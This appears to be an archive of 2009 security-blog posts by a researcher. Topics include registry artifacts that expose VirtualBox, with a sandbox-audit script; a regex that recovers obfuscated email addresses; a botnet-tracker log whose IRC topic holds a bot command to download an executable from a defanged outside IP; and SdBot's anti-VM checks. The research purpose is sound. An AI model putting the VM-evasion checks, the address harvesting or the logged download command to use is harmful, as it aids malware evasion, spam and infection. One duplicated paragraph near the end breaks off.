2009
10.21

Earlier I wrote a brief article on the theory of VM detection at “Concept of Virtual Machines and Honeypots Detection Techniques”. This time we will talk about technical details. As I use VirtualBox myself, here is one of the ways you can detect VirtualBox:

Under the registry key:

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\

VideoBiosVersion = VBOX   – 1

SystemBiosVersion = Sun xVM VirtualBox Version 2.1.4_OSE VGA BIOS
Sun xVM VirtualBox Version 2.1.4_OSE VGA BIOS
Sun xVM VirtualBox Version 2.1.4_OSE
Sun xVM VirtualBox Version 2.1.4_OSE
VirtualBox Version 2.1.4_OSE VBE Display Adapter
VirtualBox Version 2.1.4_OSE VBE Display Adapter

The above information indicates the presence of VirtualBox, and there are even more giveaways!

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\VBOX__
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0

Identifier = VBOX HARDDISK

HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0

Identifier = VBOX CD-ROM

There are hints in Device Manager, too, and it can easily be queried programmatically.

DVD/CDROM : VBOX CD-ROM
Harddisk : VBOX HARDDISK
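To check whether an analysis VM leaks these artifacts, here is a small audit script (an added example, not code from the original post). It reads the registry locations listed above; on Windows it uses the standard-library winreg module against the live HKLM hive, and elsewhere it works from a snapshot dict, which in the sample below is constructed from the values quoted in the post rather than taken from a real export. The value names, subkeys and marker strings are the ones in the post; everything else is the example's own.

```python
"""Audit an analysis VM for the VirtualBox registry artifacts listed above."""
import sys
from typing import Dict, List, Optional, Tuple, Union

# (subkey under HKEY_LOCAL_MACHINE, value name, marker substring), as quoted in the post.
VALUE_CHECKS: List[Tuple[str, str, str]] = [
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion", "VBOX"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion", "VirtualBox"),
    (r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0",
     "Identifier", "VBOX"),
    (r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0",
     "Identifier", "VBOX"),
]
# Keys whose mere existence is the giveaway (the ACPI table keys carry the OEM id).
KEY_CHECKS: List[str] = [r"HARDWARE\ACPI\DSDT\VBOX__", r"HARDWARE\ACPI\FADT\VBOX__"]

# Snapshot shape: {subkey: {value_name: data}}; REG_MULTI_SZ data is a list of strings.
Snapshot = Dict[str, Dict[str, Union[str, List[str]]]]


def snapshot_readers(snap: Snapshot):
    """Readers over an offline snapshot (constructed or copied from a .reg export)."""
    def read_value(subkey: str, name: str) -> Optional[str]:
        data = snap.get(subkey, {}).get(name)
        if data is None:
            return None
        # Flatten multi-string values so the substring search sees every line.
        return " ".join(data) if isinstance(data, list) else str(data)

    def key_exists(subkey: str) -> bool:
        return subkey in snap

    return read_value, key_exists


def winreg_readers():
    """Readers over the live HKLM hive (Windows only; winreg is standard library there)."""
    import winreg

    def read_value(subkey: str, name: str) -> Optional[str]:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                data, _kind = winreg.QueryValueEx(key, name)
        except OSError:
            return None
        return " ".join(data) if isinstance(data, list) else str(data)

    def key_exists(subkey: str) -> bool:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey):
                return True
        except OSError:
            return False

    return read_value, key_exists


def find_vbox_artifacts(read_value, key_exists) -> List[str]:
    """Return one human-readable finding per VirtualBox artifact that is present."""
    findings: List[str] = []
    for subkey, name, marker in VALUE_CHECKS:
        data = read_value(subkey, name)
        if data is not None and marker.lower() in data.lower():
            findings.append(f"HKLM\\{subkey}\\{name} = {data!r}")
    for subkey in KEY_CHECKS:
        if key_exists(subkey):
            findings.append(f"HKLM\\{subkey} exists")
    return findings


# Constructed snapshot mirroring the values quoted in the post (not a real registry export).
SAMPLE_VBOX_SNAPSHOT: Snapshot = {
    r"HARDWARE\DESCRIPTION\System": {
        "VideoBiosVersion": ["VBOX"],
        "SystemBiosVersion": ["Sun xVM VirtualBox Version 2.1.4_OSE VGA BIOS"],
    },
    r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0": {
        "Identifier": "VBOX HARDDISK"},
    r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0": {
        "Identifier": "VBOX CD-ROM"},
    r"HARDWARE\ACPI\DSDT\VBOX__": {},
    r"HARDWARE\ACPI\FADT\VBOX__": {},
}

if __name__ == "__main__":
    readers = winreg_readers() if sys.platform == "win32" else snapshot_readers(SAMPLE_VBOX_SNAPSHOT)
    for line in find_vbox_artifacts(*readers) or ["no VirtualBox artifacts found"]:
        print(line)
```

Run it inside the VM you use for malware analysis; every line it prints is a string a sample could read the same way, so an empty result is the goal when hardening the sandbox. The reader functions are split out so the same check can run over an exported hive on a non-Windows host.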

That’s just one approach. I strongly suggest reading Peter Ferrie’s paper.

I have found some resources for those interested: a Virtual Machine Threats paper and slides by Peter Ferrie (a Microsoftie now), Marshall Fryman’s blog entries here and here, and a CodeProject demonstration. I hope you find them useful.

===

A brief update. I haven’t been active for these 2 months. Since September I have been involved in some personal matters that took my time, and in October I just got on board a new job (I was a developer for server antivirus software for Microsoft Office SharePoint Server). Well, it isn’t about anti-crime but the topic of cloud security.

Cloud security! Who hasn’t heard of it?

My new job is to work on cloud computing on Windows Azure. Unfortunately I cannot reveal more. But don’t worry, I’m very serious in my anti-cybercrime endeavors. =)

http://onhacks.org/lang/en/2009/08/21/concept-of-virtual-machines-and-honeypots-detection-techniques
2009
09.25

Avert Labs has a new research paper out: “Inside the Password-Stealing Business: the Who and How of Identity Theft.” For those interested in the underground economy, you should take a look! The multi-lingual report link doesn’t seem to work: http://www.avertlabs.com/research/blog/index.php/2009/09/24/inside-the-password-stealing-business/ .

Games have always been big business, and it’s the same for the underground, too. A lot of money, even if you’re the good guys. On the other hand, you haven’t heard of people pirating “Microsoft High Performance Computing Cluster” CDs, right? =) Oh, and hey, they sell OK, even in China. There’s really money there. Yada yada…

Another thing though: as if getting infected is not enough, malware (Zbot here) could put you in legal trouble. It is no news that victims are used as stepping stones for further crime, and you really need proof that you are not involved. Zbot goes further by rendering your computer totally unusable by wiping out the registry HKEY root keys. This is enough to force a user to format immediately, killing all chances for forensics. Behind bars, anyone?

http://www.mcafee.com/us/local_content/reports/6622rpt_password_stealers_0709_en.pdf
2009
09.12

I disappeared again after my last post talking about spam collections and DNS misconfigurations. Today, I read log0’s post in which he is calling for bots/tools for his security research. Did you see anything familiar? Look at how log0 shows his contact to us: “log0 [ at ] gmail [ dot ] com”. We have been using this format for quite some time, after we realized that showing the full form of our address (e.g. spam@onhacks.org) increases the chance that our email gets exposed to spammers.

However, these kinds of representation have already been on the Internet for the last few years. Did you ever consider this fact: a clever spammer just needs to modify a few lines of code in their bots, changing the target strings they are looking for, and then everything works the same as in the past.

The most interesting thing is that RSnake blogged his findings on this form of email representation last Tuesday. In short, he googled “at gmail dot com”, and surprisingly there are at least 6 email addresses on the first result page. There are many variations, but they all have the same pattern; here are some examples:

spam  at  onhacks  dot  com
spam [at] onhacks [dot] com
spam (at) onhacks (dot) com
spam <at> onhacks <dot> com
spam “at” onhacks “dot” com

(Obviously, I am trying my best to let spammers know my address)

I spent an hour writing a very simple PoC parser to retrieve email addresses from the result page mentioned above. Obviously there are at least 4 valid email addresses, so it is not too hard for bots to get them. The parser just looks for one ‘at’ and one ‘dot’ keyword appearing sequentially in the pattern: [any word] “at” [any word] “dot” [any word]. The code is poorly written; I will improve it later this week.

It is not so difficult to discover the pattern among these email addresses; it’s a piece of cake even for primary school students. Then what kind of representation should we use to show our email address on the Internet? Display a JPEG of the email? Without adding noise to the image, it is as easy as performing text recognition. With noise on the image, it is more like a CAPTCHA. Since most CAPTCHA solvers aim at a specific type of CAPTCHA, it may take more time to decode an email “encrypted” as a CAPTCHA. However, it is not unsolvable.

What is the takeaway then? Better not to show your address on the web! Or turn it into a CAPTCHA; at least then your email address has less chance of being captured by spammers.
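To make the point concrete, here is an exposure audit you can run over your own pages (an added example, not the author’s PoC parser): it recovers addresses written in the [any word] “at” [any word] “dot” [any word] pattern, with the separators bare or wrapped in brackets, angle brackets, parentheses or quotes as in the variants listed above. The sample page is constructed from those five variants plus log0’s spaced form and two decoy lines; none of it is real scraped data.

```python
"""Recover email addresses that are only 'at'/'dot'-obfuscated (exposure audit)."""
import re
from typing import List

# 'at' or 'dot' as a whole word, optionally wrapped in [] () <> or straight/curly quotes,
# with any whitespace around it. The wrapper on each side is optional independently.
_WRAP = r'[\[\(<"“]?\s*\b{word}\b\s*[\]\)>"”]?'

OBFUSCATED = re.compile(
    r"\b(?P<user>[A-Za-z0-9._%+-]+)\s*" + _WRAP.format(word="at") +
    r"\s*(?P<domain>[A-Za-z0-9-]+(?:\s*" + _WRAP.format(word="dot") + r"\s*[A-Za-z0-9-]+)+)\b",
    re.IGNORECASE,
)

# Used to turn "onhacks [dot] com" back into "onhacks.com" once a match is found.
_DOT = re.compile(r'\s*[\[\(<"“]?\s*\bdot\b\s*[\]\)>"”]?\s*', re.IGNORECASE)


def recover_addresses(text: str) -> List[str]:
    """Return every obfuscated address in text, normalised to user@domain (lower case)."""
    found: List[str] = []
    for match in OBFUSCATED.finditer(text):
        domain = _DOT.sub(".", match.group("domain"))
        found.append(f"{match.group('user')}@{domain}".lower())
    return found


# Constructed sample page: the variants from the post plus two decoys that must not match.
SAMPLE_PAGE = """\
Contact the spam trap: spam  at  onhacks  dot  com
Alt 1: spam [at] onhacks [dot] com
Alt 2: spam (at) onhacks (dot) com
Alt 3: spam <at> onhacks <dot> com
Alt 4: spam “at” onhacks “dot” com
Mixed: log0 [ at ] gmail [ dot ] com
Decoy: we meet at the cafe, no address here.
Decoy: plain@example.org is a normal address and is not this pattern.
"""

if __name__ == "__main__":
    for address in recover_addresses(SAMPLE_PAGE):
        print(address)
```

The decoy lines show the two edges worth knowing: a bare “at” with no following “dot” word is ignored, and a plain address with a real “@” is out of scope here (any ordinary address regex already catches it). The match is deliberately loose, so expect the occasional false positive such as “look at foo dot bar” when auditing free text; for an exposure check that is the safe direction to err.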

2009
09.10

As mentioned earlier, I am working on a fully automated botnet tracking tool (hopefully I can start wrapping up all my tools that are useful for the public, and some data feeds, later).

I need a large sample of different varieties of HTTP bots. I have not captured many live, working samples of HTTP bots.

Could someone share PCAPs/binaries of HTTP bots with me (or even just the MD5sum)? Please kindly send them to log0 [ at ] onhacks [ dot ] org. Thanks!

2009
09.05

SecurityTube – security-related video tutorials; have fun learning!

2009
08.31

The Hong Kong chapter of the Honeynet Project, led by Peter Cheung and Roland Cheung, has produced two walkthroughs of their high-interaction honeypot findings, Windows and Linux. There are not many detailed walkthroughs out there, and hence I wrote one. They give a detailed (with images!) walkthrough on how to do forensics on a honeypot. I encourage avid learners to take the step and get something out of them.

Windows

http://www.honeybird.hk/project/wp-content/uploads/2009/04/honeypot-study-windows-2008.pdf

Linux

http://www.honeybird.hk/project/wp-content/uploads/2009/02/honeypot-study-linux-2008.pdf

(Hey… I really don’t know the Chinese term for Forensics…) I got the term from 冰血封情 on EvilOctal: it’s 取証. Thanks. =)

2009
08.27

Large real PCAP datasets, food!

MU Dynamics released some PCAPs obtained from the Shmoo Group and wrapped up a total of 15.0 GBytes, 26.3 million packets, with indexing. According to the Shmoo Group, “This archive contains data logged during the Capture the Flag Contest at DefCon. The Shmoo Group is publishing this data to promote the creation of more secure software and to offer data for research purposes.” For research purposes, now here comes the game to brainstorm. Go grep it if anyone needs it.

In case you don’t know, the Shmoo Group’s ShmooCon has some really high-quality presentations and the best people from the security field presenting each year. You should take a good look there to learn.

http://www.pcapr.net/forensics
2009
08.25

I read this earlier but am only posting it now… oops… I felt it was worth sharing.

Innovative? Take a look:

http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel/

Now it makes us think of the other forum boards such as Baidu Tieba, Google’s, 2ch? =)

2009
08.23

I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen, undetected) malware binaries and hopefully automated analysis too. =)

Here is something my tool caught while I was testing it on a botnet. I used one of the malware binaries caught by my honeypot to infiltrate the botnet =) They are paying off!

2009-08-23 18:27:20,644 – log-6 – INFO – Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]

There is some Deutsch (German) stuff… not necessarily theirs though. It disconnected me.

ERROR :Closing Link: [[<my ip, removed!!!>] (Client hat die Verbindung getrennt)

The binary is very new, just 4 hours old at 2009-08-23 18:27:20,644 (GMT +8).
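A tracker like the one described above has to turn the 332 (RPL_TOPIC) reply it logged into something it can act on: the channel, the bot commands the topic carries, and any download URL. The following is an added example of that step, not the author’s tool; the sample line is constructed to mirror the logged topic, with the channel name masked and the IP kept defanged (“[dot]”) exactly as the post shows it, so nothing here resolves or fetches anything.

```python
"""Extract channel, bot commands and URLs from an IRC RPL_TOPIC (332) line."""
import re
from typing import Any, Dict, List, Optional

# Constructed from the log entry in the post (channel masked, IP left defanged).
SAMPLE_TOPIC_LINE = (
    ":irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S "
    "|.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3"
)

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_irc_line(line: str) -> Dict[str, Any]:
    """Split an IRC message into prefix, command, params and trailing text (RFC 1459 shape)."""
    prefix: Optional[str] = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    # The trailing parameter starts at the first " :" and may itself contain spaces.
    head, sep, trailing = line.partition(" :")
    tokens = head.split()
    return {
        "prefix": prefix,
        "command": tokens[0],
        "params": tokens[1:],
        "trailing": trailing if sep else None,
    }


def extract_bot_commands(topic: str) -> List[Dict[str, Any]]:
    """Split a '|'-separated bot topic into {'name', 'args', 'urls'} entries."""
    commands: List[Dict[str, Any]] = []
    for chunk in topic.split("|"):
        tokens = chunk.split()
        if not tokens or not tokens[0].startswith("."):
            continue  # this family prefixes commands with '.', anything else is noise
        commands.append({
            "name": tokens[0],
            "args": tokens[1:],
            "urls": URL_RE.findall(chunk),
        })
    return commands


def topic_indicators(line: str) -> Dict[str, Any]:
    """Return channel, command names and unique URLs for a 332 reply; {} for other messages."""
    msg = parse_irc_line(line)
    if msg["command"] != "332" or not msg["trailing"]:
        return {}
    cmds = extract_bot_commands(msg["trailing"])
    return {
        "channel": next((p for p in msg["params"] if p.startswith("#")), None),
        "commands": [c["name"] for c in cmds],
        "urls": sorted({u for c in cmds for u in c["urls"]}),
    }


if __name__ == "__main__":
    print(topic_indicators(SAMPLE_TOPIC_LINE))
```

The URL list is what feeds the next stage (hashing and scanning the dropped binary, as done below); keeping it defanged in logs and reports avoids accidental fetches by anything that auto-links text.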

The binary at http://94[dot]76[dot]194[dot]116/xx8.exe (MD5sum: 7904937c07c031e81023dbd81ac93b64) has these VirusTotal results:

File winhost.exe received on 2009.08.22 15:54:06 (UTC)
Current status: finished

Result: 6/41 (14.63%)

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.08.22 -
AhnLab-V3 5.0.0.2 2009.08.21 -
AntiVir 7.9.1.3 2009.08.21 -
Antiy-AVL 2.0.3.7 2009.08.21 -
Authentium 5.1.2.4 2009.08.22 -
Avast 4.8.1335.0 2009.08.21 -
AVG 8.5.0.406 2009.08.22 Worm/Generic.AHOV
BitDefender 7.2 2009.08.22 -
CAT-QuickHeal 10.00 2009.08.22 -
ClamAV 0.94.1 2009.08.22 -
Comodo 2058 2009.08.22 -
DrWeb 5.0.0.12182 2009.08.22 BackDoor.IRC.Bot.127
eSafe 7.0.17.0 2009.08.20 -
eTrust-Vet 31.6.6694 2009.08.21 -
F-Prot 4.4.4.56 2009.08.22 -
F-Secure 8.0.14470.0 2009.08.21 -
Fortinet 3.120.0.0 2009.08.22 PossibleThreat
GData 19 2009.08.22 -
Ikarus T3.1.1.68.0 2009.08.22 -
Jiangmin 11.0.800 2009.08.21 -
K7AntiVirus 7.10.825 2009.08.22 -
Kaspersky 7.0.0.125 2009.08.22 Net-Worm.Win32.Kolab.dpo
McAfee 5716 2009.08.21 -
McAfee+Artemis 5716 2009.08.21 Artemis!7904937C07C0
McAfee-GW-Edition 6.8.5 2009.08.22 -
Microsoft 1.4903 2009.08.22 -
NOD32 4358 2009.08.22 -
Norman 6.01.09 2009.08.21 -
nProtect 2009.1.8.0 2009.08.22 -
Panda 10.0.0.14 2009.08.22 -
PCTools 4.4.2.0 2009.08.22 -
Prevx 3.0 2009.08.22 Low Risk Adware
Rising 21.43.50.00 2009.08.22 -
Sophos 4.44.0 2009.08.22 -
Sunbelt 3.2.1858.2 2009.08.22 -
Symantec 1.4.4.12 2009.08.22 -
TheHacker 6.3.4.3.385 2009.08.22 -
TrendMicro 8.950.0.1094 2009.08.22 -
VBA32 3.12.10.9 2009.08.22 -
ViRobot 2009.8.22.1897 2009.08.22 -
VirusBuster 4.6.5.0 2009.08.21 -

Detection rate 14.63%! Only 6/41 scanners detected it. Except for Kaspersky, AVG, and DrWeb, the other 3 seem to give uncertain generic results.

Which scanner are you using?

I am writing an automated tool to track botnets. Given a pile of EXEs, it automatically produces live botnet records (commands, conversations, how they work), (possibly undiscovered and undetectable) malware files, and (hopefully in future) automated analysis.

This is what my tool caught from a botnet while testing:

2009
08.21

In “Who is Hacking Me?”, I mentioned using Nmap to do a service probe on a low-interaction honeypot. I wrote briefly how to do it in my last post. The “How” part of this article [add link to the previous article] is not uninteresting, but it is the “Why” part I’d like to focus on. You know, we hackers know why things are done so, not just how. So,

Why does the methodology work?

First, ask yourself:

How do you tell a human from a computer?

The CAPTCHA solution: you test the target by asking it to recognize some text in an image. If the target passes the test, it’s likely human. If not, it’s likely a computer. The idea is that computers cannot do image recognition well, and are actually quite bad at it.

Generalizing, we ask the target to do things that only a human can do well and computers cannot. If the target being tested fails our human test, we conclude with a certain confidence that it is not human.

Well, CAPTCHA tells computers from humans. What about real services and emulated services?

In the same manner, the concept is this: an emulated service and a real service are technically different in implementation, and that difference makes them distinguishable. Targeting these differences gives you a hint about the identity of the service.

Let’s go through yet another real example. One question people love to ask is:

How do I analyze malware with anti-virtual-machine technology? It does not run in my VMware! Should I use a physical machine?

Wait, but it runs in my VirtualBox. Oh!

Go download any SdBot online or any found in the wild. They are normally armed with an anti-VM (anti-virtual-machine) module, which stops the bot’s execution if it detects it’s in a VM. You can try that in VMware, specifically VMware. Then go try it in VirtualBox. But save yourself some time; I have tested it already. =)

Wrong question. What you should ask is:

How does SdBot tell VMware from a physical machine?

It works because there are technical differences between the implementation of a VM and a physical machine. It is the same idea as the emulated services and real services mentioned in the previous article. When I say it is because of technical differences, I mean it is related to the implementation.

Precisely, SdBot running in VirtualBox but not VMware means that SdBot is not anti-VM but anti-VMware, because it specifically targets VMware, not VirtualBox.

Consider these points:

  • VMware could set a register that a physical machine doesn’t.
  • There’s a dhcpd service provided by VMware which is not generally present on real machines.
  • Some instructions of a physical CPU are not implemented/supported in VMware.

These techniques are all based on the principle above.

Though the above also implies something else: the anti-VM techniques are specific to certain implementations, and if you use a less common virtual machine implementation (VirtualBox, Xen, etc.) the SdBot WILL execute, because the anti-VM technique does not apply to VirtualBox, Xen, etc. However, there is no guarantee that an anti-VM technique can only hit one implementation; it can target the weaknesses of multiple implementations.

So, if you have to analyze SdBot in a virtualized environment, you do not need to run it on a physical machine with test automation to take care of the environment. You can create an environment the technique does not cover, or disable the technique, or whatever works. That is how it works behind the scenes. The same goes for honeypots in the general idea. So, happy honeypot hunting!